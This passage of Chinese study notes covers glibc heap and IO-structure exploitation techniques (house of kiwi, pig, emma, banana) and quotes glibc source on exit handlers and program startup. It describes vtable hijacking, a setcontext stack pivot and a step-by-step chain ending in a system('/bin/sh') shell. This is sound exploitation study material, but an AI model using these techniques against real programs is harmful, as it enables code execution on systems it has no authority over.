  • 修改vtable指针指向事先伪造的vtable(*(vtable+0x10)=system_addr),在调用IO函数时会将_IO_2_1_stdout_结构体指针作为参数传入vtable中的函数,因此可以在_IO_2_1_stdout_结构体flag字段之后的 4 字节填充中写入;sh;

house of orange

见attack ### house of husk 见attack ### house of kiwi(under 2.36) * 在没有exit下调用vtable sysmalloc

assert ((old_top == initial_top (av) && old_size == 0) ||
((unsigned long) (old_size) >= MINSIZE &&
prev_inuse (old_top) &&
((unsigned long) old_end & (pagesize - 1)) == 0));
__malloc_assert
static void
__malloc_assert (const char *assertion, const char *file, unsigned int line,
const char *function)
{
(void) __fxprintf (NULL, "%s%s%s:%u: %s%sAssertion `%s' failed.\n",
__progname, __progname[0] ? ": " : "",
file, line,
function ? function : "", function ? ": " : "",
assertion);
fflush (stderr);
abort ();
}
利用fflush中的_IO_fflush,会调用call [rbp + 0x60]rbp指向_IO_file_jumps_,调用的是_IO_new_file_sync,并且_IO_file_jumps_可写,因此只需要将_IO_file_jumps_对应_IO_new_file_sync函数指针的位置覆盖为one_gadget就可以获取

setcontext+61
.text:0000000000050C0D mov     rsp, [rdx+0A0h]
.text:0000000000050C14 mov rbx, [rdx+80h]
.text:0000000000050C1B mov rbp, [rdx+78h]
.text:0000000000050C1F mov r12, [rdx+48h]
.text:0000000000050C23 mov r13, [rdx+50h]
.text:0000000000050C27 mov r14, [rdx+58h]
.text:0000000000050C2B mov r15, [rdx+60h]
.text:0000000000050C2F test dword ptr fs:48h, 2
.text:0000000000050C3B jz loc_50CF6
...
.text:0000000000050CF6 loc_50CF6: ; CODE XREF: setcontext+6B↑j
.text:0000000000050CF6 mov rcx, [rdx+0A8h]
.text:0000000000050CFD push rcx
.text:0000000000050CFE mov rsi, [rdx+70h]
.text:0000000000050D02 mov rdi, [rdx+68h]
.text:0000000000050D06 mov rcx, [rdx+98h]
.text:0000000000050D0D mov r8, [rdx+28h]
.text:0000000000050D11 mov r9, [rdx+30h]
.text:0000000000050D15 mov rdx, [rdx+88h]
.text:0000000000050D15 ; } // starts at 50BD0
.text:0000000000050D1C ; __unwind {
.text:0000000000050D1C xor eax, eax
.text:0000000000050D1E retn

调用_IO_new_file_syncrdx指向的是_IO_helper_jumps_结构,可以通过修改_IO_helper_jumps_中的内容来给寄存器赋值

rop方法为例,需要设置rsp指向提前布置号的rop的起始位置,同时设置rip指向ret 指令

如果存在一个任意写,通过修改 _IO_file_jumps + 0x60_IO_file_sync指针为setcontext+61 修改IO_helper_jumps + 0xA0 and 0xA8分别为可迁移的存放有ROP的位置和ret指令的gadget位置,则可以进行栈迁移

house of pig(仍可以任意写)

  • 起码UAF
  1. 先用UAF漏洞泄露libc、heap
  2. 再用UAF修改largebinchunkfd_nextsizebk_nextsize位置,完成一次largebin attack,将一个堆地址写到__free_hook-0x8的位置,使得满足之后的tcache stashing unlink attack需要目标fake chunkbk位置内地址可写的条件
  3. 先构造同一大小的5tcache,继续用UAF修改该大小的smallbinchunkfd、bk位置,完成一次tcache stashing unlink attack,由于前一步已经将一个可写的堆地址,写到了__free_hook-0x8,所以可以将__free_hook-0x10的位置当作一个fake chunk,放入到tcache链表的头部,但是由于没有 malloc,我们无法将他申请出来
  4. 最后再用UAF修改largebinchunkfd_nextsizebk_nextsize位置,完成第二次largebin attack,将一个堆地址写到_IO_list_all的位置,从而在程序退出前fflush所有IO流的时候,将该堆地址当作一个FILE结构体,我们就能在该堆地址的位置来构造任意FILE结构了
  5. 在该堆地址构造FILE结构的时候,重点是将其vtable_IO_file_jumps修改为_IO_str_jumps,那么当原本应该调用IO_file_overflow的时候,就会转而调用如下的IO_str_overflow,而该函数是以传入的FILE地址本身为参数的,同时其中会连续调用malloc、memcpy、free函数,且三个函数的参数又都可以被该FILE结构中的数据控制。那么适当的构造FILE结构中的数据,就可以实现利用IO_str_overflow函数中的malloc申请出那个已经被放入到tcache链表的头部的包含__free_hookfake chunk;紧接着可以将提前在堆上布置好的数据,通过IO_str_overflow函数中的memcpy写入到刚刚申请出来的包含__free_hook的这个chunk,从而能任意控制__free_hook,这里可以将其修改为 system函数地址;最后调用IO_str_overflow函数中的free时,就能够触发__free_hook,同时还能在提前布置堆上数据的时候,使其以字符串/bin/sh\x00开头,那么最终就会执行system(“/bin/sh”)

house of emma

通过修改_IO_file_jumps_IO_cookie_jumps+offset,使得最后+偏移为_IO_cookie_write
然后在_IO_cookie_write中会直接调用指针,设置好偏移就可以去控制执行流

static const struct _IO_jump_t _IO_cookie_jumps libio_vtable = {  
JUMP_INIT_DUMMY,
JUMP_INIT(finish, _IO_file_finish),
JUMP_INIT(overflow, _IO_file_overflow),
JUMP_INIT(underflow, _IO_file_underflow),
JUMP_INIT(uflow, _IO_default_uflow),
JUMP_INIT(pbackfail, _IO_default_pbackfail),
JUMP_INIT(xsputn, _IO_file_xsputn),
JUMP_INIT(xsgetn, _IO_default_xsgetn),
JUMP_INIT(seekoff, _IO_cookie_seekoff),
JUMP_INIT(seekpos, _IO_default_seekpos),
JUMP_INIT(setbuf, _IO_file_setbuf),
JUMP_INIT(sync, _IO_file_sync),
JUMP_INIT(doallocate, _IO_file_doallocate),
JUMP_INIT(read, _IO_cookie_read),
JUMP_INIT(write, _IO_cookie_write),
JUMP_INIT(seek, _IO_cookie_seek),
JUMP_INIT(close, _IO_cookie_close),
JUMP_INIT(stat, _IO_default_stat),
JUMP_INIT(showmanyc, _IO_default_showmanyc),
JUMP_INIT(imbue, _IO_default_imbue),
};

里面存在的_IO_cookie_read、_IO_cookie_write、_IO_cookie_seek、_IO_cookie_close

static ssize_t  
_IO_cookie_read (FILE *fp, void *buf, ssize_t size) // read
{
struct _IO_cookie_file *cfile = (struct _IO_cookie_file *) fp;
cookie_read_function_t *read_cb = cfile->__io_functions.read;
#ifdef PTR_DEMANGLE
PTR_DEMANGLE (read_cb);
#endif

if (read_cb == NULL)
return -1;

return read_cb (cfile->__cookie, buf, size);
}

static ssize_t
_IO_cookie_write (FILE *fp, const void *buf, ssize_t size) // write
{
struct _IO_cookie_file *cfile = (struct _IO_cookie_file *) fp;
cookie_write_function_t *write_cb = cfile->__io_functions.write;
#ifdef PTR_DEMANGLE
PTR_DEMANGLE (write_cb);
#endif

if (write_cb == NULL)
{
fp->_flags |= _IO_ERR_SEEN;
return 0;
}

ssize_t n = write_cb (cfile->__cookie, buf, size);
if (n < size)
fp->_flags |= _IO_ERR_SEEN;

return n;
}

static off64_t
_IO_cookie_seek (FILE *fp, off64_t offset, int dir) // seek
{
struct _IO_cookie_file *cfile = (struct _IO_cookie_file *) fp;
cookie_seek_function_t *seek_cb = cfile->__io_functions.seek;
#ifdef PTR_DEMANGLE
PTR_DEMANGLE (seek_cb);
#endif

return ((seek_cb == NULL
|| (seek_cb (cfile->__cookie, &offset, dir)
== -1)
|| offset == (off64_t) -1)
? _IO_pos_BAD : offset);
}

static int
_IO_cookie_close (FILE *fp) // close
{
struct _IO_cookie_file *cfile = (struct _IO_cookie_file *) fp;
cookie_close_function_t *close_cb = cfile->__io_functions.close;
#ifdef PTR_DEMANGLE
PTR_DEMANGLE (close_cb);
#endif

if (close_cb == NULL)
return 0;

return close_cb (cfile->__cookie);
}

这几个函数中都存在直接的函数调用 当然在函数调用前存在一个检测PTR_DEMANGLE 调试过程可以发现,利用的fs[0x30],可以去修改该处值为我们已知值

house of banana

exit

main()函数return时,有一些析构工作需要完成 - 用户层面: - 需要释放libc中的流缓冲区,退出前清空下stdout的缓冲区,释放TLS, … - 内核层面: - 释放掉这个进程打开的文件描述符,释放掉task结构体,… - 再所有资源都被释放完毕后,内核会从调度队列从取出这个任务 - 然后向父进程发送一个信号,表示有一个子进程终止 - 此时这个进程才算是真正结束

因此我们可以认为: - 进程终止 => 释放其所占有的资源 + 不再分配CPU时间给这个进程

内核层面的终止是通过exit系统调用来进行的,其实现就是一个syscalllibc中声明为

#include <unistd.h> 
void _exit(int status);

但是如果直接调用_exit(),会出现一些问题,比如stdout的缓冲区中的数据会直接被内核释放掉,无法刷新,导致信息丢失 因此在调用_exit()之前,还需要在用户层面进行一些析构工作

libc将负责这个工作的函数定义为exit(),其声明如下

#include <stdlib.h> 
extern void exit (int __status);

void
exit (int status)
{
__run_exit_handlers (status, &__exit_funcs, true, true);
}

void
attribute_hidden
__run_exit_handlers (int status, struct exit_function_list **listp,
bool run_list_atexit, bool run_dtors)
{
/* First, call the TLS destructors. */
#ifndef SHARED
if (&__call_tls_dtors != NULL)
#endif
if (run_dtors)
__call_tls_dtors ();

__libc_lock_lock (__exit_funcs_lock);

/* We do it this way to handle recursive calls to exit () made by
the functions registered with `atexit' and `on_exit'. We call
everyone on the list and use the status value in the last
exit (). */
while (true)
{
struct exit_function_list *cur = *listp;

if (cur == NULL)
{
/* Exit processing complete. We will not allow any more
atexit/on_exit registrations. */
__exit_funcs_done = true;
break;
}

while (cur->idx > 0)
{
struct exit_function *const f = &cur->fns[--cur->idx];
const uint64_t new_exitfn_called = __new_exitfn_called;

switch (f->flavor)
{
void (*atfct) (void);
void (*onfct) (int status, void *arg);
void (*cxafct) (void *arg, int status);
void *arg;

case ef_free:
case ef_us:
break;
case ef_on:
onfct = f->func.on.fn;
arg = f->func.on.arg;
#ifdef PTR_DEMANGLE
PTR_DEMANGLE (onfct);
#endif
/* Unlock the list while we call a foreign function. */
__libc_lock_unlock (__exit_funcs_lock);
onfct (status, arg);
__libc_lock_lock (__exit_funcs_lock);
break;
case ef_at:
atfct = f->func.at;
#ifdef PTR_DEMANGLE
PTR_DEMANGLE (atfct);
#endif
/* Unlock the list while we call a foreign function. */
__libc_lock_unlock (__exit_funcs_lock);
atfct ();
__libc_lock_lock (__exit_funcs_lock);
break;
case ef_cxa:
/* To avoid dlclose/exit race calling cxafct twice (BZ 22180),
we must mark this function as ef_free. */
f->flavor = ef_free;
cxafct = f->func.cxa.fn;
arg = f->func.cxa.arg;
#ifdef PTR_DEMANGLE
PTR_DEMANGLE (cxafct);
#endif
/* Unlock the list while we call a foreign function. */
__libc_lock_unlock (__exit_funcs_lock);
cxafct (arg, status);
__libc_lock_lock (__exit_funcs_lock);
break;
}

if (__glibc_unlikely (new_exitfn_called != __new_exitfn_called))
/* The last exit function, or another thread, has registered
more exit functions. Start the loop over. */
continue;
}

*listp = cur->next;
if (*listp != NULL)
/* Don't free the last element in the chain, this is the statically
allocate element. */
free (cur);
}

__libc_lock_unlock (__exit_funcs_lock);

if (run_list_atexit)
RUN_HOOK (__libc_atexit, ());

_exit (status);
}

struct exit_function
{
/* `flavour' should be of type of the `enum' above but since we need
this element in an atomic operation we have to use `long int'. */
long int flavor;
union
{
void (*at) (void);
struct
{
void (*fn) (int status, void *arg);
void *arg;
} on;
struct
{
void (*fn) (void *arg, int status);
void *arg;
void *dso_handle;
} cxa;
} func;
};
struct exit_function_list
{
struct exit_function_list *next;
size_t idx;
struct exit_function fns[32];
};
extern struct exit_function_list *__exit_funcs attribute_hidden;

综上所述: * exit(status) *__run_exit_handlers(status)*__call_tls_dtors* 遍历exit_function_list*ef_cxa:调用__cxa_atexit注册函数 *ef_at:调用atexit注册的函数 *ef_on:调用on_exit注册的函数 * ... * 若执行期间有新的回调注册则回到链表头重新执行 * 释放动态分配的回调节点 * 如果run_list_atexit==true,则执行__libc_atexit* 最终调用_exit(status)`

__exit_funcs

函数指针要用fs:0x30解密

typedef struct  
{
void *tcb; /* Pointer to the TCB. Not necessarily the
thread descriptor used by libpthread. */
dtv_t *dtv;
void *self; /* Pointer to the thread descriptor. */
int multiple_threads;
int gscope_flag;
uintptr_t sysinfo;
uintptr_t stack_guard;
uintptr_t pointer_guard;
unsigned long int unused_vgetcpu_cache[2];
/* Bit 0: X86_FEATURE_1_IBT.
Bit 1: X86_FEATURE_1_SHSTK.
*/
unsigned int feature_1;
int __glibc_unused1;
/* Reservation of some values for the TM ABI. */
void *__private_tm[4];
/* GCC split stack support. */
void *__private_ss;
/* The lowest address of shadow stack, */
unsigned long long int ssp_base;
/* Must be kept even if it is no longer used by glibc since programs,
like AddressSanitizer, depend on the size of tcbhead_t. */
__128bits __glibc_unused2[8][4] __attribute__ ((aligned (32)));

void *__padding[8];
} tcbhead_t;
exit_function注册

遍历链表执行的是atexit等函数注册的函数,我们找到atexit

/* Register FUNC to be executed by `exit'.  */
int
#ifndef atexit
attribute_hidden
#endif
atexit (void (*func) (void))
{
return __cxa_atexit ((void (*) (void *)) func, NULL, __dso_handle);
}
__cxa_atexit
/* Register a function to be called by exit or when a shared library
is unloaded. This function is only called from code generated by
the C++ compiler. */
int
__cxa_atexit (void (*func) (void *), void *arg, void *d)
{
return __internal_atexit (func, arg, d, &__exit_funcs);
}
libc_hidden_def (__cxa_atexit)
__internal_atexit
int
attribute_hidden
__internal_atexit (void (*func) (void *), void *arg, void *d,
struct exit_function_list **listp)
{
struct exit_function *new;

/* As a QoI issue we detect NULL early with an assertion instead
of a SIGSEGV at program exit when the handler is run (bug 20544). */
assert (func != NULL);

__libc_lock_lock (__exit_funcs_lock);
new = __new_exitfn (listp);

if (new == NULL)
{
__libc_lock_unlock (__exit_funcs_lock);
return -1;
}

#ifdef PTR_MANGLE
PTR_MANGLE (func);
#endif
new->func.cxa.fn = (void (*) (void *, int)) func;
new->func.cxa.arg = arg;
new->func.cxa.dso_handle = d;
new->flavor = ef_cxa;
__libc_lock_unlock (__exit_funcs_lock);
return 0;
}
__new_exitfn
/* Must be called with __exit_funcs_lock held.  */
struct exit_function *
__new_exitfn (struct exit_function_list **listp)
{
struct exit_function_list *p = NULL;
struct exit_function_list *l;
struct exit_function *r = NULL;
size_t i = 0;

if (__exit_funcs_done)
/* Exit code is finished processing all registered exit functions,
therefore we fail this registration. */
return NULL;

for (l = *listp; l != NULL; p = l, l = l->next)
{
for (i = l->idx; i > 0; --i)
if (l->fns[i - 1].flavor != ef_free)
break;

if (i > 0)
break;

/* This block is completely unused. */
l->idx = 0;
}

if (l == NULL || i == sizeof (l->fns) / sizeof (l->fns[0]))
{
/* The last entry in a block is used. Use the first entry in
the previous block if it exists. Otherwise create a new one. */
if (p == NULL)
{
assert (l != NULL);
p = (struct exit_function_list *)
calloc (1, sizeof (struct exit_function_list));
if (p != NULL)
{
p->next = *listp;
*listp = p;
}
}

if (p != NULL)
{
r = &p->fns[0];
p->idx = 1;
}
}
else
{
/* There is more room in the block. */
r = &l->fns[i];
l->idx = i + 1;
}

/* Mark entry as used, but we don't know the flavor now. */
if (r != NULL)
{
r->flavor = ef_us;
++__new_exitfn_called;
}

return r;
}

先尝试在__exit_funcs中找到一个exit_function类型的ef_free的位置, ef_free代表着此位置空闲

如果没找到, 就新建一个exit_function节点, 使用头插法插入__exit_funcs链表, 使用新节点的第一个位置作为分配到的exit_function结构体设置找到的exit_function的类型为ef_us, 表示正在使用中, 并返回

这里只是找位置,那么注册的是什么函数呢?这些函数在main之前就被注册了,我们看一下程序的入口_start

_start

ENTRY (_start)
/* Clearing frame pointer is insufficient, use CFI. */
cfi_undefined (rip)
/* Clear the frame pointer. The ABI suggests this be done, to mark
the outermost frame obviously. */
xorl %ebp, %ebp

/* Extract the arguments as encoded on the stack and set up
the arguments for __libc_start_main (int (*main) (int, char **, char **),
int argc, char *argv,
void (*init) (void), void (*fini) (void),
void (*rtld_fini) (void), void *stack_end).
The arguments are passed via registers and on the stack:
main: %rdi
argc: %rsi
argv: %rdx
init: %rcx
fini: %r8
rtld_fini: %r9
stack_end: stack. */

mov %RDX_LP, %R9_LP /* Address of the shared library termination
function. */
#ifdef __ILP32__
mov (%rsp), %esi /* Simulate popping 4-byte argument count. */
add $4, %esp
#else
popq %rsi /* Pop the argument count. */
#endif
/* argv starts just at the current stack top. */
mov %RSP_LP, %RDX_LP
/* Align the stack to a 16 byte boundary to follow the ABI. */
and $~15, %RSP_LP

/* Push garbage because we push 8 more bytes. */
pushq %rax

/* Provide the highest stack address to the user code (for stacks
which grow downwards). */
pushq %rsp

/* These used to be the addresses of .fini and .init. */
xorl %r8d, %r8d
xorl %ecx, %ecx

#ifdef PIC
mov main@GOTPCREL(%rip), %RDI_LP
#else
mov $main, %RDI_LP
#endif

/* Call the user's main function, and exit with its value.
But let the libc call main. Since __libc_start_main in
libc.so is called very early, lazy binding isn't relevant
here. Use indirect branch via GOT to avoid extra branch
to PLT slot. In case of static executable, ld in binutils
2.26 or above can convert indirect branch into direct
branch. */
call *__libc_start_main@GOTPCREL(%rip)

hlt /* Crash if somehow `exit' does return. */
END (_start)

/* Define a symbol for the first piece of initialized data. */
.data
.globl __data_start
__data_start:
.long 0
.weak data_start
data_start = __data_start

我们关注其传递给__libc_start_main的参数mainargcargvinitfinirtld_finistack_end,前三个不用赘述,initfinirtld_fini

/* Note: The init and fini parameters are no longer used.  fini is
completely unused, init is still called if not NULL, but the
current startup code always passes NULL. (In the future, it would
be possible to use fini to pass a version code if init is NULL, to
indicate the link-time glibc without introducing a hard
incompatibility for new programs with older glibc versions.)

For dynamically linked executables, the dynamic segment is used to
locate constructors and destructors. For statically linked
executables, the relevant symbols are access directly. */
STATIC int
LIBC_START_MAIN (int (*main) (int, char **, char ** MAIN_AUXVEC_DECL),
int argc, char **argv,
#ifdef LIBC_START_MAIN_AUXVEC_ARG
ElfW(auxv_t) *auxvec,
#endif
__typeof (main) init,
void (*fini) (void),
void (*rtld_fini) (void), void *stack_end)
{
#ifndef SHARED
char **ev = &argv[argc + 1];

__environ = ev;

/* Store the lowest stack address. This is done in ld.so if this is
the code for the DSO. */
__libc_stack_end = stack_end;

# ifdef HAVE_AUX_VECTOR
/* First process the auxiliary vector since we need to find the
program header to locate an eventually present PT_TLS entry. */
# ifndef LIBC_START_MAIN_AUXVEC_ARG
ElfW(auxv_t) *auxvec;
{
char **evp = ev;
while (*evp++ != NULL)
;
auxvec = (ElfW(auxv_t) *) evp;
}
# endif
_dl_aux_init (auxvec);
if (GL(dl_phdr) == NULL)
# endif
{
/* Starting from binutils-2.23, the linker will define the
magic symbol __ehdr_start to point to our own ELF header
if it is visible in a segment that also includes the phdrs.
So we can set up _dl_phdr and _dl_phnum even without any
information from auxv. */

extern const ElfW(Ehdr) __ehdr_start
# if BUILD_PIE_DEFAULT
__attribute__ ((visibility ("hidden")));
# else
__attribute__ ((weak, visibility ("hidden")));
if (&__ehdr_start != NULL)
# endif
{
assert (__ehdr_start.e_phentsize == sizeof *GL(dl_phdr));
GL(dl_phdr) = (const void *) &__ehdr_start + __ehdr_start.e_phoff;
GL(dl_phnum) = __ehdr_start.e_phnum;
}
}

/* Initialize very early so that tunables can use it. */
__libc_init_secure ();

__tunables_init (__environ);

ARCH_INIT_CPU_FEATURES ();

/* Do static pie self relocation after tunables and cpu features
are setup for ifunc resolvers. Before this point relocations
must be avoided. */
_dl_relocate_static_pie ();

/* Perform IREL{,A} relocations. */
ARCH_SETUP_IREL ();

/* The stack guard goes into the TCB, so initialize it early. */
ARCH_SETUP_TLS ();

/* In some architectures, IREL{,A} relocations happen after TLS setup in
order to let IFUNC resolvers benefit from TCB information, e.g. powerpc's
hwcap and platform fields available in the TCB. */
ARCH_APPLY_IREL ();

/* Set up the stack checker's canary. */
uintptr_t stack_chk_guard = _dl_setup_stack_chk_guard (_dl_random);
# ifdef THREAD_SET_STACK_GUARD
THREAD_SET_STACK_GUARD (stack_chk_guard);
# else
__stack_chk_guard = stack_chk_guard;
# endif

# ifdef DL_SYSDEP_OSCHECK
{
/* This needs to run to initiliaze _dl_osversion before TLS
setup might check it. */
DL_SYSDEP_OSCHECK (__libc_fatal);
}
# endif

/* Initialize libpthread if linked in. */
if (__pthread_initialize_minimal != NULL)
__pthread_initialize_minimal ();

/* Set up the pointer guard value. */
uintptr_t pointer_chk_guard = _dl_setup_pointer_guard (_dl_random,
stack_chk_guard);
# ifdef THREAD_SET_POINTER_GUARD
THREAD_SET_POINTER_GUARD (pointer_chk_guard);
# else
__pointer_chk_guard_local = pointer_chk_guard;
# endif

#endif /* !SHARED */

/* Register the destructor of the dynamic linker if there is any. */
if (__glibc_likely (rtld_fini != NULL))
__cxa_atexit ((void (*) (void *)) rtld_fini, NULL, NULL);

#ifndef SHARED
/* Perform early initialization. In the shared case, this function
is called from the dynamic loader as early as possible. */
__libc_early_init (true);

/* Call the initializer of the libc. This is only needed here if we
are compiling for the static library in which case we haven't
run the constructors in `_dl_start_user'. */
__libc_init_first (argc, argv, __environ);

/* Register the destructor of the statically-linked program. */
__cxa_atexit (call_fini, NULL, NULL);

/* Some security at this point. Prevent starting a SUID binary where
the standard file descriptors are not opened. We have to do this
only for statically linked applications since otherwise the dynamic
loader did the work already. */
if (__builtin_expect (__libc_enable_secure, 0))
__libc_check_standard_fds ();
#endif /* !SHARED */

/* Call the initializer of the program, if any. */
#ifdef SHARED
if (__builtin_expect (GLRO(dl_debug_mask) & DL_DEBUG_IMPCALLS, 0))
GLRO(dl_debug_printf) ("\ninitialize program: %s\n\n", argv[0]);

if (init != NULL)
/* This is a legacy program which supplied its own init
routine. */
(*init) (argc, argv, __environ MAIN_AUXVEC_PARAM);
else
/* This is a current program. Use the dynamic segment to find
constructors. */
call_init (argc, argv, __environ);

/* Auditing checkpoint: we have a new object. */
_dl_audit_preinit (GL(dl_ns)[LM_ID_BASE]._ns_loaded);

if (__glibc_unlikely (GLRO(dl_debug_mask) & DL_DEBUG_IMPCALLS))
GLRO(dl_debug_printf) ("\ntransferring control: %s\n\n", argv[0]);
#else /* !SHARED */
call_init (argc, argv, __environ);

_dl_debug_initialize (0, LM_ID_BASE);
#endif

__libc_start_call_main (main, argc, argv MAIN_AUXVEC_PARAM);
}

/* Starting with glibc 2.34, the init parameter is always NULL. Older
libcs are not prepared to handle that. The macro
DEFINE_LIBC_START_MAIN_VERSION creates GLIBC_2.34 alias, so that
newly linked binaries reflect that dependency. The macros below
expect that the exported function is called
__libc_start_main_impl. */

glibc2.34以后,initfini两个参数已经废弃,可以看到,其内部自行使用了call_init函数

/* Initialization for dynamic executables.  Find the main executable
link map and run its init functions. */
static void
call_init (int argc, char **argv, char **env)
{
/* Obtain the main map of the executable. */
struct link_map *l = GL(dl_ns)[LM_ID_BASE]._ns_loaded;

/* DT_PREINIT_ARRAY is not processed here. It is already handled in
_dl_init in elf/dl-init.c. Also see the call_init function in
the same file. */

if (ELF_INITFINI && l->l_info[DT_INIT] != NULL)
DL_CALL_DT_INIT(l, l->l_addr + l->l_info[DT_INIT]->d_un.d_ptr,
argc, argv, env);

ElfW(Dyn) *init_array = l->l_info[DT_INIT_ARRAY];
if (init_array != NULL)
{
unsigned int jm
= l->l_info[DT_INIT_ARRAYSZ]->d_un.d_val / sizeof (ElfW(Addr));
ElfW(Addr) *addrs = (void *) (init_array->d_un.d_ptr + l->l_addr);
for (unsigned int j = 0; j < jm; ++j)
((dl_init_t) addrs[j]) (argc, argv, env);
}
}

/* Initialization for static executables. There is no dynamic
segment, so we access the symbols directly. */
static void
call_init (int argc, char **argv, char **envp)
{
/* For static executables, preinit happens right before init. */
{
const size_t size = __preinit_array_end - __preinit_array_start;
size_t i;
for (i = 0; i < size; i++)
(*__preinit_array_start [i]) (argc, argv, envp);
}

# if ELF_INITFINI
_init ();
# endif

const size_t size = __init_array_end - __init_array_start;
for (size_t i = 0; i < size; i++)
(*__init_array_start [i]) (argc, argv, envp);
}

可以看到这里,对于动态链接程序先获取link_map,然后执行.init,再遍历 .init_array 函数数组,执行程序和共享库的所有构造函数。而对于动态链接器的构造函数则由另一个函数_dl_init再调用call_init执行,这个函数如下

void
_dl_init (struct link_map *main_map, int argc, char **argv, char **env)
{
ElfW(Dyn) *preinit_array = main_map->l_info[DT_PREINIT_ARRAY];
ElfW(Dyn) *preinit_array_size = main_map->l_info[DT_PREINIT_ARRAYSZ];
unsigned int i;

if (__glibc_unlikely (GL(dl_initfirst) != NULL))
{
call_init (GL(dl_initfirst), argc, argv, env);
GL(dl_initfirst) = NULL;
}

/* Don't do anything if there is no preinit array. */
if (__builtin_expect (preinit_array != NULL, 0)
&& preinit_array_size != NULL
&& (i = preinit_array_size->d_un.d_val / sizeof (ElfW(Addr))) > 0)
{
ElfW(Addr) *addrs;
unsigned int cnt;

if (__glibc_unlikely (GLRO(dl_debug_mask) & DL_DEBUG_IMPCALLS))
_dl_debug_printf ("\ncalling preinit: %s\n\n",
DSO_FILENAME (main_map->l_name));

addrs = (ElfW(Addr) *) (preinit_array->d_un.d_ptr + main_map->l_addr);
for (cnt = 0; cnt < i; ++cnt)
((dl_init_t) addrs[cnt]) (argc, argv, env);
}

/* Stupid users forced the ELF specification to be changed. It now
says that the dynamic loader is responsible for determining the
order in which the constructors have to run. The constructors
for all dependencies of an object must run before the constructor
for the object itself. Circular dependencies are left unspecified.

This is highly questionable since it puts the burden on the dynamic
loader which has to find the dependencies at runtime instead of
letting the user do it right. Stupidity rules! */

i = main_map->l_searchlist.r_nlist;
while (i-- > 0)
call_init (main_map->l_initfini[i], argc, argv, env);

#ifndef HAVE_INLINED_SYSCALLS
/* Finished starting up. */
_dl_starting_up = 0;
#endif
}
_dl_init又由谁调用呢?这里发现另一个_start(?),位于dl-start.S动态链接器的入口点),上文的_start位于start.S程序的入口点)

/* Initial entry point code for the dynamic linker.
The function _dl_start is the real entry point;
it's return value is the user program's entry point. */
ENTRY (_start)
/* Count arguments in r11 */
l.ori r3, r1, 0
l.movhi r11, 0
1:
l.addi r3, r3, 4
l.lwz r12, 0(r3)
l.sfnei r12, 0
l.addi r11, r11, 1
l.bf 1b
l.nop
l.addi r11, r11, -1
/* store argument counter to stack. */
l.sw 0(r1), r11

/* Load the PIC register. */
l.jal 0x8
l.movhi r16, gotpchi(_GLOBAL_OFFSET_TABLE_-4)
l.ori r16, r16, gotpclo(_GLOBAL_OFFSET_TABLE_+0)
l.add r16, r16, r9

l.ori r3, r1, 0

l.jal _dl_start
l.nop
/* Save user entry in a call saved reg. */
l.ori r22, r11, 0
/* Fall through to _dl_start_user. */

_dl_start_user:
/* Set up for _dl_init. */

/* Load _rtld_local (a.k.a _dl_loaded). */
l.lwz r12, got(_rtld_local)(r16)
l.lwz r3, 0(r12)

/* Load argc */
l.lwz r18, got(_dl_argc)(r16)
l.lwz r4, 0(r18)

/* Load argv */
l.lwz r20, got(_dl_argv)(r16)
l.lwz r5, 0(r20)

/* Load envp = &argv[argc + 1]. */
l.slli r6, r4, 2
l.addi r6, r6, 4
l.add r6, r6, r5

l.jal plt(_dl_init)
l.nop

/* Now set up for user entry.
The already defined ABI loads argc and argv from the stack.

argc = 0(r1)
argv = r1 + 4
*/

/* Load SP as argv - 4. */
l.lwz r3, 0(r20)
l.addi r1, r3, -4

/* Save argc. */
l.lwz r3, 0(r18)
l.sw 0(r1), r3

/* Pass _dl_fini function address to _start.
Next start.S will then pass this as rtld_fini to __libc_start_main. */
l.lwz r3, got(_dl_fini)(r16)

l.jr r22
l.nop

END (_start)

发现正是这里调用了_dl_start_dl_init
如此完成初始化构造,可以看到call_fini静态链接程序),rtld_fini动态链接程序)也是在__libc_start_main完成注册的

__cxa_atexit ((void (*) (void *)) rtld_fini, NULL, NULL);
...
/* Register the destructor of the statically-linked program. */
__cxa_atexit (call_fini, NULL, NULL);

__libc_start_main的最后

__libc_start_call_main (main, argc, argv MAIN_AUXVEC_PARAM);

_Noreturn static __always_inline void
__libc_start_call_main (int (*main) (int, char **, char ** MAIN_AUXVEC_DECL),
int argc, char **argv MAIN_AUXVEC_DECL)
{
exit (main (argc, argv, __environ MAIN_AUXVEC_PARAM));
}

正是它最终调用main以及exit,同时这也解释了为什么main函数返回地址总是在__libc_start_call_main的一定偏移处。
现在我们再看被注册的rtld_fini,其实际调用_dl_fini函数,作用是调用进程空间中所有模块的析构函数,也就是遍历.fini_array,看其源码的这一段

/* Is there a destructor function?  */
if (l->l_info[DT_FINI_ARRAY] != NULL
|| (ELF_INITFINI && l->l_info[DT_FINI] != NULL))
{
/* When debugging print a message first. */
if (__builtin_expect (GLRO(dl_debug_mask) & DL_DEBUG_IMPCALLS, 0))
_dl_debug_printf ("\ncalling fini: %s [%lu]\n\n",
DSO_FILENAME (l->l_name),
ns);

/* First see whether an array is given. */
if (l->l_info[DT_FINI_ARRAY] != NULL)
{
ElfW(Addr) *array =
(ElfW(Addr) *) (l->l_addr + l->l_info[DT_FINI_ARRAY]->d_un.d_ptr);
unsigned int i = (l->l_info[DT_FINI_ARRAYSZ]->d_un.d_val
/ sizeof (ElfW(Addr)));
while (i-- > 0)
((fini_t) array[i]) ();
}

/* Next try the old-style destructor. */
if (ELF_INITFINI && l->l_info[DT_FINI] != NULL)
DL_CALL_DT_FINI
(l, l->l_addr + l->l_info[DT_FINI]->d_un.d_ptr);
}

这里执行了.fini以及遍历了.fini_array

总结

  • 内核执行execve()系统调用
  • 加载ELF可执行文件
    • 动态链接程序:发现.interp
      • 内核加载动态链接器ld.so
      • 跳转到ld.so入口地址->_dl_start (dl-start.S)
        • _dl_init
          • call_init (执行ld.so自身的.init_array)
      • ld.so加载依赖库 (libc.so等) 并重定位
      • 跳转到程序入口->_start (start.S)
    • 静态链接程序:直接跳转到_start (start.S)
  • _start
    • __libc_start_main
      • 注册析构函数:
      • 静态链接:__cxa_atexit(call_fini)
        • 程序自身析构器
      • 动态链接:__cxa_atexit(rtld_fini)
        • 动态链接器统一收尾调用dl_fini
      • call_init(执行程序和libc.init_array)
  • __libc_start_call_main
    • 调用main()
    • exit(main())
  • 用户调用exit(status)
    • __run_exit_handlers(status)
      • 调用 TLS 析构函数__call_tls_dtors
      • 遍历exit_function_list
        • ef_cxa
          • 静态程序:call_fini
            • 执行程序自身.fini_array
          • 动态程序:rtld_fini
            • _dl_fini
              • 按依赖顺序执行共享库.fini_array/DT_FINI
              • 清理动态链接器资源
        • ef_at -> atexit注册的函数
